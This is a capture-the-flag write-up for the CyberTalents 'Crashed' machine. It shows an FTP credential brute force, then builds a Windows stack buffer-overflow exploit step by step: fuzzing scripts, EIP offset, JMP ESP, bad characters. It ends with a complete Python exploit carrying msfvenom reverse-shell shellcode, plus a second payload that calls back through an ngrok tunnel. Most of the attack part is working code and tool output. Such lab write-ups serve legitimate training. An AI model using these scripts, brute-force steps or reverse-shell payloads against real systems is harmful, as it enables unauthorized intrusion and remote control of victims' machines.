Posts Cybertalents Crashed Machine Writeup
Post
Cancel

Cybertalents Crashed Machine Writeup

Description

Get The highest privilege on the machine and find the flag!

Difficulty: Hard

Target IP: 3.122.178.169

Target IP: 18.193.129.237

Challenge Link: https://cybertalents.com/challenges/machines/crashed

Enumeration

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
root@kali:~/CyberTalents/Crashed# nmap -p21,135,139,445,1887,3389,5357 -A -T4 35.156.101.240
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-12 15:31 BST
Nmap scan report for ec2-35-156-101-240.eu-central-1.compute.amazonaws.com (35.156.101.240)
Host is up (0.014s latency).

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           FileZilla ftpd
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows Server 2019 Datacenter 17763 microsoft-ds
1887/tcp open  filex-lport
3389/tcp open  ms-wbt-server Microsoft Terminal Services
5357/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable

FTP

So we have here an FTP server, I tried to join with anonymous creds but it didn’t worked. Now, we have only one solutions which to brute force the password. we can use a Metasploit module called auxiliary/scanner/ftp/ftp_login. it requires a space separated wordlist we will use a wordlist form sec list but we need to edit to match our requirements, we will replace the : with a space.

1
2
root@kali:~/CyberTalents/Crashed# cat /usr/share/wordlists/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt >> ftp.txt
root@kali:~/CyberTalents/Crashed# cat ftp.txt | sed "s/:/ /g" >> ftp-space-seprated.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
msf6 > use auxiliary/scanner/ftp/ftp_login
msf6 auxiliary(scanner/ftp/ftp_login) > set rhosts 35.156.101.240
rhosts => 35.156.101.240
msf6 auxiliary(scanner/ftp/ftp_login) > set USERPASS_FILE ~/CyberTalents/Crashed/ftp-space-seprated.txt
USERPASS_FILE => ~/CyberTalents/Crashed/ftp-space-seprated.txt
msf6 auxiliary(scanner/ftp/ftp_login) > run

[*] 35.156.101.240:21     - 35.156.101.240:21 - Starting FTP login sweep
[!] 35.156.101.240:21     - No active DB -- Credential data will not be saved!
[-] 35.156.101.240:21     - 35.156.101.240:21 - LOGIN FAILED: anonymous:anonymous (Incorrect: )
[-] 35.156.101.240:21     - 35.156.101.240:21 - LOGIN FAILED: root:rootpasswd (Incorrect: )
[-] 35.156.101.240:21     - 35.156.101.240:21 - LOGIN FAILED: root:12hrs37 (Incorrect: )
[-] 35.156.101.240:21     - 35.156.101.240:21 - LOGIN FAILED: ftp:b1uRR3 (Incorrect: )
[-] 35.156.101.240:21     - 35.156.101.240:21 - LOGIN FAILED: admin:admin (Incorrect: )
[-] 35.156.101.240:21     - 35.156.101.240:21 - LOGIN FAILED: localadmin:localadmin (Incorrect: )
[-] 35.156.101.240:21     - 35.156.101.240:21 - LOGIN FAILED: admin:1234 (Incorrect: )
[-] 35.156.101.240:21     - 35.156.101.240:21 - LOGIN FAILED: apc:apc (Incorrect: )
[-] 35.156.101.240:21     - 35.156.101.240:21 - LOGIN FAILED: admin:nas (Incorrect: )
[-] 35.156.101.240:21     - 35.156.101.240:21 - LOGIN FAILED: Root:wago (Incorrect: )
[-] 35.156.101.240:21     - 35.156.101.240:21 - LOGIN FAILED: Admin:wago (Incorrect: )
[-] 35.156.101.240:21     - 35.156.101.240:21 - LOGIN FAILED: User:user (Incorrect: )
[-] 35.156.101.240:21     - 35.156.101.240:21 - LOGIN FAILED: Guest:guest (Incorrect: )
[+] 35.156.101.240:21     - 35.156.101.240:21 - Login Successful: ftp:ftp

So now we have a successful creds let’s use them and see what is inside the ftp.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@kali:~/CyberTalents/Crashed# ftp 3.122.178.169
Connected to 3.122.178.169.
220-FileZilla Server 0.9.60 beta
220-written by Tim Kosse (tim.kosse@filezilla-project.org)
220 Please visit https://filezilla-project.org/
Name (3.122.178.169:root): ftp
331 Password required for ftp
Password:
230 Logged on
Remote system type is UNIX.
ftp> ls
200 Port command successful
150 Opening data channel for directory listing of "/"
-r--r--r-- 1 ftp ftp          30036 Sep 08  2020 essfunc.dll
-r-xr-xr-x 1 ftp ftp          51635 Sep 10  2020 super_secure_server.exe

hmm! this machine seems to be a BOF machine. So let’s download these files first. I copied these file to windows 7 machine to work on them Locally First.

Buffer Overflow

Enumeration

I run the super secure server in my local machine and it looks like the following:

It listens for a connection. So we need to know which port that its running on. we can simply open the CMD and type netstat -ab

It listens on port 13337. we let’s connect to it form our Kali Machine.

hmm! We need to find anther command to know more about the application. a good solution for this simply we can run strings command to see the hidden command in the executable.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
root@kali:~/CyberTalents/Crashed# strings super_secure_server.exe 
!This program cannot be run in DOS mode.
.text
P`.data
.rdata
0@/4
0@.bs
Starting the super secure server version %s
WSAStartup failed with error: %d
Getaddrinfo failed with error: %d
Socket failed with error: %ld
Bind failed with error: %d
Listen failed with error: %d
Waiting for client connections...
Accept failed with error: %d
Received a client connection from %s:%u
Usage: %s [port_number]
If no port number is provided, the default port of %s will be used.
Welcome to the super secure server! Enter HELP for help
Send failed with error: %d
HELP 
HELP
SECRET
Mission Completed

‌ Now, as you see the hidden command is SECRET that we need it to exploit Buffer flow vulnerability.

Fuzzing

The first phase of exploiting any buffer overflow vulnerability is first to find the vulnerable command and then to know How many characters that you need to overflow the buffer and crash the application.

We have to create a simple python script for this job which will be:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
#!/usr/bin/python3
import sys
from time import sleep
import socket

buffer = 'A' * 100

while True:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(("192.168.1.6", 13337))
        s.recv(1024)
        s.send(('SECRET'+ buffer))
        s.recv(1024)
        s.close()
        sleep(1)
        buffer = buffer + 'A' * 100
    except:
        print("Fuzzing Crashed at {} bytes".format(str(len(buffer))))
        sys.exit()

This script will send a bunch of A strings that is increasing every time until we trigger the crash of the application.

Let’s attach our program to the Immunity debugger. Then, run our script.

The application needs 1000 bytes of strings to crash.

Overwrite EIP

EIP is the instruction pointer. It points to (holds the address of) the first byte of the next instruction to be executed. So we need to control the next instruction that will be executed to point it to a our reverse shell and pwn the machine. to do that we need to create a unique set of strings using Metasploit.

1
2
root@kali:~/CyberTalents/Crashed# msf-pattern_create -l 1500
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9

‌ Then we need to edit our script to send this unique string.

1
2
3
4
5
6
7
8
9
10
11
12
#!/usr/bin/python3
import sys
from time import sleep
import socket

buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.6", 13337))
s.recv(1024)
s.send(('SECRET'+ buffer))
s.close()

By running this Fuzzer we will notice in the debugger which string has overwrite the EIP.

The EIP points to 33684232 So we need to know what this number place between our unique string. Metasploit also provide a tool that we will us in this process.

1
2
root@kali:~/CyberTalents/Crashed# msf-pattern_offset -l 1500 -q 33684232
[*] Exact match at offset 998

‌ Now let’s edit our script to ensure that the EIP will be overwritten.

1
2
3
4
5
6
7
8
9
10
11
12
13
#!/usr/bin/python3
import sys
from time import sleep
import socket

buffer = "A" * 998 + "B" * 4 + "C" * 498

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect(("192.168.1.6", 13337))
s.recv(1024)
s.send(("SECRET"+ buffer + '\r\n'))
s.close()

When run this script we will find in the immunity debugger that the EIP has been overwritten by BBBB == 424242

JMP ESP

As I said we need to overwrite the EIP to control the next instruction. we need to point the next instruction to the ESP which we also control it. so need to find the hex number for a JMP ESP instruction. we can utilize Mona to do our Job.

https://github.com/corelan/mona

Then, we enter these commands in the immunity debugger:

1
2
!mona modules
!mona find -s '\xff\xe4'  -m essfunc.dll

we can choose between these pointers as long as all protection are disabled.

Check Bad-Chars

Now, before we create our exploit we need to find the bad character that will prevent our exploit form running. we can use this script to check the bad-chars.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
#!/usr/bin/python3
import sys
from time import sleep
import socket

badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

buffer = "A" * 998 + "\xA0\x12\x50\x62" + badchars

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect(("192.168.1.6", 13337))
s.recv(1024)
s.send(("SECRET"+ buffer + '\r\n'))
s.close()

After running the script we will see the following:

By doing some eye-process checking we can see that there is no bad chars except "\x00"

Generate Payload

The last step that we will do to help us create our final exploit is to generate the shell code by using Msfvenom that will allow us to control the machine and obtain a reverse shell.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
root@kali:~/CyberTalents/Crashed# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.4 LPORT=4444 EXITFUNC=thread -f py -a x86 –platform windows -b "\x00"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of py file: 1712 bytes
buf =  b""
buf += b"\xda\xc6\xd9\x74\x24\xf4\x5e\x29\xc9\xbf\x48\x33\x25"
buf += b"\x1b\xb1\x52\x31\x7e\x17\x03\x7e\x17\x83\xa6\xcf\xc7"
buf += b"\xee\xca\xd8\x8a\x11\x32\x19\xeb\x98\xd7\x28\x2b\xfe"
buf += b"\x9c\x1b\x9b\x74\xf0\x97\x50\xd8\xe0\x2c\x14\xf5\x07"
buf += b"\x84\x93\x23\x26\x15\x8f\x10\x29\x95\xd2\x44\x89\xa4"
buf += b"\x1c\x99\xc8\xe1\x41\x50\x98\xba\x0e\xc7\x0c\xce\x5b"
buf += b"\xd4\xa7\x9c\x4a\x5c\x54\x54\x6c\x4d\xcb\xee\x37\x4d"
buf += b"\xea\x23\x4c\xc4\xf4\x20\x69\x9e\x8f\x93\x05\x21\x59"
buf += b"\xea\xe6\x8e\xa4\xc2\x14\xce\xe1\xe5\xc6\xa5\x1b\x16"
buf += b"\x7a\xbe\xd8\x64\xa0\x4b\xfa\xcf\x23\xeb\x26\xf1\xe0"
buf += b"\x6a\xad\xfd\x4d\xf8\xe9\xe1\x50\x2d\x82\x1e\xd8\xd0"
buf += b"\x44\x97\x9a\xf6\x40\xf3\x79\x96\xd1\x59\x2f\xa7\x01"
buf += b"\x02\x90\x0d\x4a\xaf\xc5\x3f\x11\xb8\x2a\x72\xa9\x38"
buf += b"\x25\x05\xda\x0a\xea\xbd\x74\x27\x63\x18\x83\x48\x5e"
buf += b"\xdc\x1b\xb7\x61\x1d\x32\x7c\x35\x4d\x2c\x55\x36\x06"
buf += b"\xac\x5a\xe3\x89\xfc\xf4\x5c\x6a\xac\xb4\x0c\x02\xa6"
buf += b"\x3a\x72\x32\xc9\x90\x1b\xd9\x30\x73\xe4\xb6\x3b\x87"
buf += b"\x8c\xc4\x3b\x96\x10\x40\xdd\xf2\xb8\x04\x76\x6b\x20"
buf += b"\x0d\x0c\x0a\xad\x9b\x69\x0c\x25\x28\x8e\xc3\xce\x45"
buf += b"\x9c\xb4\x3e\x10\xfe\x13\x40\x8e\x96\xf8\xd3\x55\x66"
buf += b"\x76\xc8\xc1\x31\xdf\x3e\x18\xd7\xcd\x19\xb2\xc5\x0f"
buf += b"\xff\xfd\x4d\xd4\x3c\x03\x4c\x99\x79\x27\x5e\x67\x81"
buf += b"\x63\x0a\x37\xd4\x3d\xe4\xf1\x8e\x8f\x5e\xa8\x7d\x46"
buf += b"\x36\x2d\x4e\x59\x40\x32\x9b\x2f\xac\x83\x72\x76\xd3"
buf += b"\x2c\x13\x7e\xac\x50\x83\x81\x67\xd1\xa3\x63\xad\x2c"
buf += b"\x4c\x3a\x24\x8d\x11\xbd\x93\xd2\x2f\x3e\x11\xab\xcb"
buf += b"\x5e\x50\xae\x90\xd8\x89\xc2\x89\x8c\xad\x71\xa9\x84"

Now, let’s add our shell code to our final exploit.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
#!/usr/bin/python3
import sys
from time import sleep
import socket

buf =  b""
buf += b"\xb8\xa9\x88\x23\xc6\xdb\xd5\xd9\x74\x24\xf4\x5b\x29"
buf += b"\xc9\xb1\x52\x83\xc3\x04\x31\x43\x0e\x03\xea\x86\xc1"
buf += b"\x33\x10\x7e\x87\xbc\xe8\x7f\xe8\x35\x0d\x4e\x28\x21"
buf += b"\x46\xe1\x98\x21\x0a\x0e\x52\x67\xbe\x85\x16\xa0\xb1"
buf += b"\x2e\x9c\x96\xfc\xaf\x8d\xeb\x9f\x33\xcc\x3f\x7f\x0d"
buf += b"\x1f\x32\x7e\x4a\x42\xbf\xd2\x03\x08\x12\xc2\x20\x44"
buf += b"\xaf\x69\x7a\x48\xb7\x8e\xcb\x6b\x96\x01\x47\x32\x38"
buf += b"\xa0\x84\x4e\x71\xba\xc9\x6b\xcb\x31\x39\x07\xca\x93"
buf += b"\x73\xe8\x61\xda\xbb\x1b\x7b\x1b\x7b\xc4\x0e\x55\x7f"
buf += b"\x79\x09\xa2\xfd\xa5\x9c\x30\xa5\x2e\x06\x9c\x57\xe2"
buf += b"\xd1\x57\x5b\x4f\x95\x3f\x78\x4e\x7a\x34\x84\xdb\x7d"
buf += b"\x9a\x0c\x9f\x59\x3e\x54\x7b\xc3\x67\x30\x2a\xfc\x77"
buf += b"\x9b\x93\x58\xfc\x36\xc7\xd0\x5f\x5f\x24\xd9\x5f\x9f"
buf += b"\x22\x6a\x2c\xad\xed\xc0\xba\x9d\x66\xcf\x3d\xe1\x5c"
buf += b"\xb7\xd1\x1c\x5f\xc8\xf8\xda\x0b\x98\x92\xcb\x33\x73"
buf += b"\x62\xf3\xe1\xd4\x32\x5b\x5a\x95\xe2\x1b\x0a\x7d\xe8"
buf += b"\x93\x75\x9d\x13\x7e\x1e\x34\xee\xe9\xe1\x61\xf1\xed"
buf += b"\x89\x73\xf1\xfc\x15\xfd\x17\x94\xb5\xab\x80\x01\x2f"
buf += b"\xf6\x5a\xb3\xb0\x2c\x27\xf3\x3b\xc3\xd8\xba\xcb\xae"
buf += b"\xca\x2b\x3c\xe5\xb0\xfa\x43\xd3\xdc\x61\xd1\xb8\x1c"
buf += b"\xef\xca\x16\x4b\xb8\x3d\x6f\x19\x54\x67\xd9\x3f\xa5"
buf += b"\xf1\x22\xfb\x72\xc2\xad\x02\xf6\x7e\x8a\x14\xce\x7f"
buf += b"\x96\x40\x9e\x29\x40\x3e\x58\x80\x22\xe8\x32\x7f\xed"
buf += b"\x7c\xc2\xb3\x2e\xfa\xcb\x99\xd8\xe2\x7a\x74\x9d\x1d"
buf += b"\xb2\x10\x29\x66\xae\x80\xd6\xbd\x6a\xa0\x34\x17\x87"
buf += b"\x49\xe1\xf2\x2a\x14\x12\x29\x68\x21\x91\xdb\x11\xd6"
buf += b"\x89\xae\x14\x92\x0d\x43\x65\x8b\xfb\x63\xda\xac\x29"


buffer = "A" * 998 + "\xA0\x12\x50\x62" + "\x90" * 147 + buf

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect(("192.168.1.6", 13337))
s.recv(1024)
s.send(("SECRET"+ buffer + '\r\n'))
s.close()

We used an encoder to generate the payload, so a space in memory is needed for the payload to unpack! that is why we have added "\x90"

By running our exploit we will receive a reverse shell successfully. but still we have obtained a reverse shell in our local machine we need to run this exploit to the Crashed Machine to get the Flag.

Root

IP tunneling

I tried to run the same exploit but on the real machine but I didn’t receive a reverse shell back. the problem was that the IP address of the machine is public IP and as my network behind NAT/Firewall we need to figure out a solution to get a successful reverse shell.This is could be achieved by many scenarios

  • Using VPS with public IP and exposed to the internet to receive the reverse shell response to a specified port, This is a costly solution.

  • Configure a port forward method on my network router, this requires admin access to the Router/Modem and some advanced configuration.

  • The ultimate solution is to use the application to tunnel all the traffic to my host.

The easiest solution here is to use Ngrok which is an application to tunnel the traffic of a public IP through your machine It can be set up easily by seeing the documentation.

https://ngrok.com/

I will run Ngrok in my Linux machine to tunnel the traffic in my localhost at port 9001.

1
2
3
4
5
6
7
8
9
10
11
root@kali:~# /ngrok tcp 9001
ngrok by @inconshreveable                                                                                             (Ctrl+C to quit)
                                                                                                                                 
Session Status                online                                                                                                
Account                       Muhammad (Plan: Free)                                                                                   
Version                       2.3.40                                                                                                  
Region                        United States (us)                                                                                      
Web Interface                 http://127.0.0.1:4040                                                                                   
Forwarding                    tcp://8.tcp.ngrok.io:11581 -> localhost:9001                                                                                                                                                      
Connections                   ttl     opn     rt1     rt5     p50     p90                                                             
                              6       0       0.00    0.00    0.00    282.54 

Remote Exploit

Now, the final step is that we need to edit the IP of the reverse shell. we will add the IP and the port of ngrok to receive the reverse shell in it then he will tunnel to our local machine.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
root@kali:~/CyberTalents/Crashed# msfvenom -p windows/shell_reverse_tcp LHOST=8.tcp.ngrok.io LPORT=11581 EXITFUNC=thread -f py -a x86 –platform windows -b "\x00"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of py file: 1712 bytes
buf =  b""
buf += b"\xbf\xbf\xb5\x81\x09\xda\xcc\xd9\x74\x24\xf4\x5a\x31"
buf += b"\xc9\xb1\x52\x31\x7a\x12\x83\xc2\x04\x03\xc5\xbb\x63"
buf += b"\xfc\xc5\x2c\xe1\xff\x35\xad\x86\x76\xd0\x9c\x86\xed"
buf += b"\x91\x8f\x36\x65\xf7\x23\xbc\x2b\xe3\xb0\xb0\xe3\x04"
buf += b"\x70\x7e\xd2\x2b\x81\xd3\x26\x2a\x01\x2e\x7b\x8c\x38"
buf += b"\xe1\x8e\xcd\x7d\x1c\x62\x9f\xd6\x6a\xd1\x0f\x52\x26"
buf += b"\xea\xa4\x28\xa6\x6a\x59\xf8\xc9\x5b\xcc\x72\x90\x7b"
buf += b"\xef\x57\xa8\x35\xf7\xb4\x95\x8c\x8c\x0f\x61\x0f\x44"
buf += b"\x5e\x8a\xbc\xa9\x6e\x79\xbc\xee\x49\x62\xcb\x06\xaa"
buf += b"\x1f\xcc\xdd\xd0\xfb\x59\xc5\x73\x8f\xfa\x21\x85\x5c"
buf += b"\x9c\xa2\x89\x29\xea\xec\x8d\xac\x3f\x87\xaa\x25\xbe"
buf += b"\x47\x3b\x7d\xe5\x43\x67\x25\x84\xd2\xcd\x88\xb9\x04"
buf += b"\xae\x75\x1c\x4f\x43\x61\x2d\x12\x0c\x46\x1c\xac\xcc"
buf += b"\xc0\x17\xdf\xfe\x4f\x8c\x77\xb3\x18\x0a\x80\xb4\x32"
buf += b"\xea\x1e\x4b\xbd\x0b\x37\x88\xe9\x5b\x2f\x39\x92\x37"
buf += b"\xaf\xc6\x47\x97\xff\x68\x38\x58\xaf\xc8\xe8\x30\xa5"
buf += b"\xc6\xd7\x21\xc6\x0c\x70\xcb\x3d\xc7\x7c\x82\x9a\x13"
buf += b"\xeb\x98\xe4\x36\xd6\x15\x02\x22\x38\x70\x9d\xdb\xa1"
buf += b"\xd9\x55\x7d\x2d\xf4\x10\xbd\xa5\xfb\xe5\x70\x4e\x71"
buf += b"\xf5\xe5\xbe\xcc\xa7\xa0\xc1\xfa\xcf\x2f\x53\x61\x0f"
buf += b"\x39\x48\x3e\x58\x6e\xbe\x37\x0c\x82\x99\xe1\x32\x5f"
buf += b"\x7f\xc9\xf6\x84\xbc\xd4\xf7\x49\xf8\xf2\xe7\x97\x01"
buf += b"\xbf\x53\x48\x54\x69\x0d\x2e\x0e\xdb\xe7\xf8\xfd\xb5"
buf += b"\x6f\x7c\xce\x05\xe9\x81\x1b\xf0\x15\x33\xf2\x45\x2a"
buf += b"\xfc\x92\x41\x53\xe0\x02\xad\x8e\xa0\x23\x4c\x1a\xdd"
